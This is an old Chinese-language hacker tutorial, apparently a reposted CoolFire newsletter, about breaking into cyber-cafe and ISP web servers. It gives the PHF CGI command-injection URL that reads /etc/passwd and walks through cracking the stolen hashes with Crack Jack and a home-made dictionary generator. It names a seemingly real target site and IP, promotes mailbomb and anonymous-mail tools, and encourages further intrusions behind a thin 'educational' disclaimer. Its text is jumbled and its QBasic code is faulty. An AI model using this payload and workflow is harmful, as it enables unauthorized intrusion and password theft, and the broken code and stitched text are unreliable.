hacker.txt

来自「一套关于加解密的文件」· 文本 代码 · 共 725 行 · 第 1/3 页

  字, 你的呢? 是不是小巫见大巫呀 ?? 那麽就赶快充实一下字典档再重新寻找吧 !!

  许多人的密码都有一定的法则, 我自己写了 PaSs2DiC 就是将 UserName 由
passwd档转成字典档
  的工具, 这是对一些喜欢使用 UserName 当作 Password 的人最好的方式,
但是也曾经好运的找到
  别人的密码, 真不晓得"甲"是不是暗恋"乙"才用"乙"的 ID 作为密码的 ???
你可以很简单的使用
  Qbasic 来制作 "序数" 密码, 或日期密码, 底下简单的作一个 0101 (一月一日) 到
1231 的密码
  档出来:
------------Cut Here MakeDate.BAS -------------------
           Open "Dates" for output as #1
           for I=1 to 12
           for J=1 to 31
               I1$=rtrim$(ltrim$str$(I)))
               J1$=rtrim$(ltrim$str$(J)))
               if len(I1$)=1 then I1$="0"+I1$
               if len(J1$)=1 then J1$="0"+J1$
               Out$=I1$+J1$
               print #1,Out$  
           next I
           next J
           close
------------ Cut Here End MakeDate.BAS ----------------
  这支小程式将会写一个 "DATES" 的档案, 里面就是你要的字典, 当然啦,
这只是包含月跟日 !! 
  如果你要猜的密码是含年份的, 你可能要再增加一些程式码, 再 Run 一次试试看了,
不过这是一
  个好的开始不是吗 ??

**如何保护自己的密码

  谈了这麽多的密码猜法, 当然要谈一下如何保护自己的密码不被破解,
请遵守以下的原则: [1]不
  用生日作为密码(太容易猜了啦) [2]不用序数作为密码(除非你的序数无限大)
[3]不用身份证字号
  作为密码(LetMeIn! 里有猜身份证字号的功能耶)
[4]不用在字典中查得到的字作为密码. 
  
  那麽依照上面的几点说法, 甚麽样子的密码最不容易猜, 自己也最好记呢?? 答案是:
用一句有意
  义的话来作为自己的密码, 例如: NoOneCanCrackIt 就是一个很难猜的密码类型,
基於这个密码猜
  法的原则, 你的密码是不是要作些更新, 或是大小写要作一些对调 ?? 如果你的密码是
coolfire,
  建议你最好能改成 CoolFire 或 coolfires (加复数 "s"),
这样被猜中的机率就小了很多. 如果
  你是一个 Hacker, 你的密码也被人猜中的话... 那...#%%^^^&@

**正式的话题
   
  这次的话题当然还是 Crack, 相信许多人已经看过 CoolHC#1 了,
当然眼尖的人可能也已经 D/L
  System Holes 试过了, 你有成功的例子吗 ?? 如果没有, 这份 CoolHC#2
可能就是你的强心针,
  因为这次谈的正是 System Holes #1 成功的案例.

  Step 1. 连线到 "蕃薯藤" 找 "网路咖啡" 找到好多家网路咖啡的 WWW 网址,
一一连上去试试看
          在 System Holes #1 中的方法可不可行.
  Step 2. 若可行则会传回 /etc/passwd 资讯, 存档後迅速 Logout, 使用 Crack Jack
解读!!

  [[实例探讨]]
   
  System Holes #1 中所介绍的 WWW 入侵法是这样子的:
           http://www.somewhere.com/cgi-bin/nph-test-cgi?* 後再
           http://www.somewhere.com/cgi-bin/phf?Qalias=x%0aless%/20/etc/passwd

   [1] 用 WWW Browser 连到 yournet.net
   [2] Location 输入 --> "www.yournet.net/cgi-bin/nph-test-cgi?*"
   [3] 接著如果出来一份像 Report 的画面的话, 接著输入
/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
   [4] 发生了甚麽事?? etc/passwd 在你的浏览器中 "显示" 出来了 !! 快点 Save 吧
!!

  这个方法所用的是系统 "检索" 的漏洞, 不提供这个功能,
或是伺服器检索类型不同的机器则不
  会接受这样的指令, 当然也就逃过我们这次的模拟演练啦 !! 但是.... 相信我,
你一定会找到一
  家脱线的网路咖啡, 并没有像我们一样每天阅读 Mail List 的信,
对系统安全一点研究也没有的
  人不在少数. http://hacker.welcome.com 就是这样的一个 Net Coffee Shop...
呵.... 快来试
  试吧 !! 

  当 CoolFire 抓到 /etc/passwd 後, 立刻存档, 也马上断线, 并且拿出 UltraEdit
来瞧一下使用
  者的资讯, 当然这个小 passwd 对 Crack Jack 来说, 实在是不够看,
没几分钟就在我的 486 机
  器上显示出来几个以 UserName 作为 Password 的资讯 (归功於 PaSs2DiC 及
CrackJack 的功劳)
  不过当我试著找寻 root 的密码时, 一想到我那将近 20 万字的字典档,
就想到可能花费的时间一
  定相当的惊人, 於是就以 Jack 的 Option 设定只寻找 root 那一行, ...
(过了良久)... 果不然
  又是一个笨 root. 用了 "非常" 容易猜的密码... <--- This is JackAss... 呵!! Got
It!

  如果你所使用的机器速度不是顶快, 你最好能够到快一点的机器上使用 Crack Jack,
不然你也可
  以将字典档切割成几个小档案, 然後再分别在几台机器上跑, 我目前使用的配备是
486DX4-130
  32MB RAM, 3.2GB HDD, 近 20 万字的字典档, 如果在分析较大的 passwd
档时我会将字典档切割
  为四至五个小档 (看有多少台机器可跑),
然後在周末下班前在公司的几台机器上分别执行 Crack
  Jack, 等到礼拜一上班时就等著接收成果了! 当然如果你只有一台机器, passwd
档又很大的话,
  由於 Crack Jack 无法於 Windoz 95 下使用, 你可能只能牺升时间或机器来跑了!
再没有办法的
  话, 亦可使用单机多工, 多开几个 DOS Box 来跑 Brute, 也许也是一个可行的办法!

**後语

  有许多人在使用 Crack Jack 的时候有许多问题, 不过看了 CoolHC#1 应该都解决了吧
?? 最近大
  家问的比较多的是 UpYours 3.0, 虽然已经改进了 Install 的问题,
不过大家的问题还是都出在
  Winsck.ocx 上面, 有人说装了 MSICP Beta 会好 ?? 但也有实例装了也还不能 Run 的,
在此建议
  大家不要再玩 MailBomb 了, 虽然我喜欢收集这种东西, 但还是少乱炸为妙,
已经证实有许多常用
  的 MailBomb 没有办法 Fake IP 了 !! 所以... 如果 UpYours 3.0
装不起来的人就试试 KaBoom!
  V3.0 吧 ! 虽然没有办法 Fake IP (选错 Mail Server 的话), 但是也是一个不错的
AnonyMailer
  如果要发匿名信, 现在首页上有可以帮你发信的 Mailer, 会安全一点. 

  如果你仍旧对 UpYours 3.0 不死心, 就试试 ResSvr32.exe (Under Windows/system
directory),
  看看能不能将 WinSck.ocx 装上了...  记得先 UnReg 再 Reg... 

  在此建议大家可以多订阅一些 "系统安全" 讨论的 Mail List
或多参考一些已经被找出来的系统
  漏洞, 因为有些人对这些方面并不是很重视, 所以这些资讯也就显得格外的重要了,
如果能够多
  参考一些资讯, 在你入侵的时候会有很大的帮助, 当然, 如果你能作出一份列表出来,
放在手边
  参考的话, 就可以快速的; 安全的入侵了!! 下一次所谈的是 SendMail 的 Bug 实例,
在这中间
  当然照往例会先出一份 System Holes #2 来作为资料. 如果有兴趣的人在 SH#2
出来的时候可以
  先研究看看. 下次见! Merry X'Mas..... & Happy New Year.......
  
------
上次讲的 Home Page 建置案还没搞完, 没有充实一下 Home Page 实在是对不起大家,
所以利用一点
时间写了 CoolHC#2, 可能报告又交不出来了 !! 老话,
如果你有兴趣写其它程式的中文说明, 请完
成後寄一份给我, 我将它放在 Home Page 上面让其它人参考,
当然你也可以给我你的使用心得, 让
别人参考看看也行! 目前准备收集一系列的 System Hole List,
如果你在其它的站台有看到的, 请
把它先 Cut 下来, Mail 一份给我 ! 

------
再次重申, Crack 别人站台之後不要破坏别人站台中的资料, 此篇文章仅作为教育目的,
不主张你随
便入侵他人主机.... (高-Net 还是除外)... 请勿将这类技术使用於破坏上 (又...
如果第三次世界
大战开打, 你可以任意破坏敌国的电脑网路... 我全力支持),
最严重的情况(如果你真的很讨厌该主
机的话)... 就将它 Shut Down.... 好了! 别太暴力了!

CoolFire 在 hotmail 的 ID 被别人抢先一步, 所以我的 ID 就变成 CoolFires 了 !!
真是 XO...

My Mail Address: coolfires@hotmail.com (有问题可以写信到这个地址发问, 不要写到
fetag 了)
      Home Page: www.showtower.com.tw/~fetag 中的 Hackker&Mailer 区(Still
UnderGround)





           

  老庄  ( Victor Chuang )
  Email:   Internet: stvictor@hotmail.com    stvictor@usa.net
           视 聆 通: victor@www.jumbo.co.cn  stmud1@email.st.gnet.cn


这不是一个教学文件, 只是告诉你该如何破解系统,
好让你能够将自己的系统作安全的保护, 如果
你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是 
CoolFire, 写
这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人 Crack Password
若有人因此文件
导致恶意入侵别人的电脑或网路, 本人概不负责 !!

前几次说到了 Net Coffee 店, 还好他们没有提供客户拨接上线的功能,
不然密码或是帐号被人盗用
的客户不就糗大了! 但是 CoolFire 在这两周的探险中, 为了找一个酷似网路咖啡站台的
W3 密码,
误入一个号称第一个提供网路拨接的 ISP, 且在 CoolFire 顺利的抓回 /etc/passwd
之後, 使用了自己
写的 PaSs2DiC + CJack 来解出密码, 没想到不用 1 分钟, 就找出了 9 组 ID 与
Password 相同的密码,
勿怪我没有在这里提醒大家, 还好我没有找到 root password, 不然可能该系统就此停摆,
不可再见
天日也! (当然我不可能这麽作啦!).

看看最近兴起的网路咖啡及各大网站的系统安全设施, 再加上 CoolFire
最近开会的时候遇到的情
况, 不难发现我们的国家正往高科技的领域快步迈进, 但是这些系统的安全性若不加强,
可能到时
候人家只要一台电脑再加上一台数据机就可以让整个国家的金融及工商业　溃!
大家要小心呀 !
ISP 是一般 User 拨接的源头, 技术上理应比较强, 但还是轻易让人入侵, 且又没有教导
User 正确
的网路使用观念 (Password 的设定及 proxy 的使用等),
实在不敢想像这样的网路发展到几年後会
是甚麽样子 ?? 

这一次的说明还是没有谈到新的技巧, 在 James
将首页更新後各位应该已经可以从中学到许多东
西了, 如果想要学习入侵, 就一定要知道最新的资讯 (入侵本国的网路则不用,
反正没人重视网路
安全..... 真失望), 在别人还没将 Bug 修正之前就抢先一步拿到 /etc/passwd,
所以订阅一些网路安全
的 Mail List 是必要的, 多看一些网安有关的 News Group 也是必要的 (不仅 Hacker
如此, ISP 更要
多注意这些资讯!). 日後有空再整里一些 Mail List 给大家 !!

本次主题: 说明如何连接该 ISP 并且对其 /etc/passwd 解码
连接位址: www.coffee.com.tw (203.66.169.11)
特别说明: 由於本次主题说明重点使用真实的位址及名称, 所以 CoolFire 已经 Mail
给该网页之维
                 护人员更改密码, 但该网页之 ISP 仍为新手之练习好题材! CoolFire
Mail 给该网页维护
                 人员之信件内容如下, 如果他还不尽快改掉, 我也没办法了!

                 Mail sent to dhacme@tp.globalnet.com.tw:
                 Subject: 请速更动网页密码
                 From: CoolFire <coolfires@hotmail.com>

                 你的网页作得不错, 但是因为你所设定的密码太容易为骇客所